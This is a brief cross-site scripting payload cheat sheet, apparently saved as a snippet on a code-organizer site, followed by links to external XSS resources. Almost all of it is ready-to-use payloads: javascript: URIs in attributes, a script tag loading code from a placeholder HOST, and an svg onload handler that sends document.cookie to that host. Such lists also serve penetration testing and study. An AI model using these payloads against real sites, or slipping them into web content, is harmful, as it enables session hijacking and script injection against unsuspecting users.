Cacher is the code snippet organizer for pro developers

In an attribute

<a src="javascript:alert('XSS');">click me</a>
<a src="javascript:alert(/XSS/);">click me</a>

<script src=//HOST/1.js></script>
<svg onload=fetch('//HOST/?cookie='+document.cookie)>

Social media

• https://twitter.com/XssPayloads

Web

• https://brutelogic.com.br/blog/xss101/
• https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs (Angular sandbox escape)
• https://portswigger.net/web-security/cross-site-scripting/cheat-sheet